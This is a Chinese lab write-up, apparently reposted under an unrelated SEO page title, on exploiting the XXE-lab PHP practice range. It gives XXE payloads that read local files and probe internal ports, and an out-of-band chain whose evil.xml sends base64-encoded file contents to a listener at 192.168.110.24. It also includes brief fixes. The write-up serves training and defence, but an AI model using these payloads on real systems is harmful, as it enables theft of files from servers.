当前位置：首页 > news >正文

无锡抛无锡网站建设广场/如何建立和设计公司网站

news 文章来源：https://blog.csdn.net/weixin_68416970/article/details/140807125 2025/3/18 19:05:02

无锡抛无锡网站建设广场,如何建立和设计公司网站,网站建设中的端口,襄阳网站建设目录有回显测试回显位置构建payload 无回显数据外带构建payload 漏洞修复 XXE-lab是一个一个包含php,java,python,C#等各种语言版本的XXE漏洞靶场。下载地址：https://github.com/c0ny1/xxe-lab 将PHPStudy的中间件与版本信息调制为 php-5.4.29Apache 以…

有回显

测试回显位置

构建payload

无回显数据外带

构建payload

漏洞修复

XXE-lab是一个一个包含php,java,python,C#等各种语言版本的XXE漏洞靶场。

下载地址：https://github.com/c0ny1/xxe-lab

将PHPStudy的中间件与版本信息调制为 php-5.4.29+Apache 以下，然后访问以下地址开始练习

http://127.0.0.1/xxe-lab-master/php_xxe/

有回显

打开PHP_XXE目录下的 index.html 文件查看源代码，发现73行会在 Login按钮下会触发JavaScript脚本的 doLogin() 函数。

查看 doLogin() 函数定义代码，发现 JavaScript 脚本会将用户输入的 username 和 password 拼接为xml格式的数据，并且利用 ajax 的方法提交，提交时 xml 的数据被当作 POST 数据包的内容提交。

打开后端的 doLogin.php 文件在该 PHP 文件中，主要是接收POST请求的内容，并将其转化为XML对象，然后提取XML对象中的 username 和 password 字段。然后比对两个字段值分别是否相等。

libxml_disable_entity_loader(Fash)
代码意思是设置允许PHP加载外部实体，这也是本靶场的漏洞产生主要原因。在生产环境下需要将这里的False改为True，即可避免产生XXE漏洞。
loadXML()
该函数可以将一个输入的字符串转化为DOMDocument对象。
simplexml_import_dom()
该函数可以把DOM节点转化为SimpleXMLElement对象。

在登录界面输入账号密码并抓取数据包

测试回显位置

通过测试，能看到用户名位置存在有回显的。而后面密码字段就无回显

构建payload

<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY name SYSTEM "file:///c://windows/win.ini">
]><user><username>&name;</username><password>1</password></user>

读取本地文件（写一个 1.txt 文件，内容随便，我这里是 3 个 hello）

<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY name SYSTEM "file:///d://1.txt">
]><user><username>&name;</username><password>1</password></user>

使用PHP伪协议读取文件

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE XL [
<!ENTITY fl SYSTEM "php://filter/read=convert.base64-encode/resource=d:/1.txt">]><user><username>&fl;</username><password>1</password></user>

探测内网存活主机与端口

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE XL [
<!ENTITY fl SYSTEM "http://127.0.0.1:3306">]><user><username>&fl;</username><password>1</password></user>

无回显数据外带

把XXE-labs靶场的输出及报错都关闭，模拟无回显情况，把 phpStudy_64\phpstudy_pro\WWW\xxe-lab-master\php_xxe\doLogin.php 的 doLogin.php 中的最后一行代码注释掉，在账号密码上面加一句代码

error_reporting(0);

构建payload

1、运行下面的XML语法，发现没有了数据回显

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE ANY [
<!ENTITY % shit SYSTEM "http://127.0.0.1:80/1.txt">
%shit;
]>

2、在远程服务器上创建 evil.xml 文件并使用 Python 开启 http 服务

1.php 内容：

<?php file_put_contents("1.txt", $_GET['file']); ?>

evil.xml内容：

<!ENTITY % payload "<!ENTITY &#x25; send SYSTEM 'http://192.168.110.24:8000/1.php?content=%file;'>"> %payload;

python -m http.server 8000

3、构造外部实体并进行访问

<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=D:/1.txt">
<!ENTITY % dtd SYSTEM "http://192.168.110.24:8000/evil.xml">
%dtd;
%send;
]>

回到HTTP服务器上发现数据已经带到请求日志上，经Base64解码得出内容

漏洞修复

1、使用开发语言禁用外部实体；

2、过滤 SYSTEM/PUBLIC 等关键字；

无锡抛无锡网站建设广场/如何建立和设计公司网站

有回显

测试回显位置

构建payload

无回显数据外带

构建payload

漏洞修复

相关文章：

XXE-lab-master靶场：PHP_xxe

视图，存储过程和触发器

sqli-labs(6-10)关通关讲解

【解决方法】git clone出现 curl 56 OpenSSL SSL_read: Connection was reset, errno 10054

机械拆装-基于Unity-本地数据持久化

【SpringBoot】4.3.5 参数传递之ModelAndView对象

《技术人求职之道》之简历优化篇（上）：量身打造简历，如何与自身情况完美匹配

mysql+php+html实现学生管理系统

find+rm一行命令删除文件夹及子文件夹下文件，不删除子文件夹，或者用python实现

超详细的linux-conda环境安装教程

vite项目构建配置

Java 反射机制与Spring框架的那点事

计算机网络面试题3

day54|110.字符串接龙, 105.有向图的完全可达性, 106.岛屿的周长

使用docker在CentOS 7上安装php+mysql+nginx环境教程并运行WordPress

vite tsx项目的element plus集成 - 按需引入踩坑

Android GreenDao 升级保留旧表数据

记一次证书站有趣的SQL注入

1_初识pytorch

c++typeid()的使用

【面向就业的Linux基础】从入门到熟练，探索Linux的秘密（十四）-租云服务器及配环境、docker基本命令

实现一个全栈模糊搜索匹配的功能

智慧景区导览系统小程序开发

HIVE调优方式及原因

deploy local llm ragflow

测桃花运（算姻缘）的网站系统源码

电商平台优惠券

内衣洗衣机多维度测评对比，了解觉飞、希亦、鲸立哪款内衣洗衣机更好

数据结构和算法入门

基于OpenCV C++的网络实时视频流传输——Windows下使用TCP/IP编程原理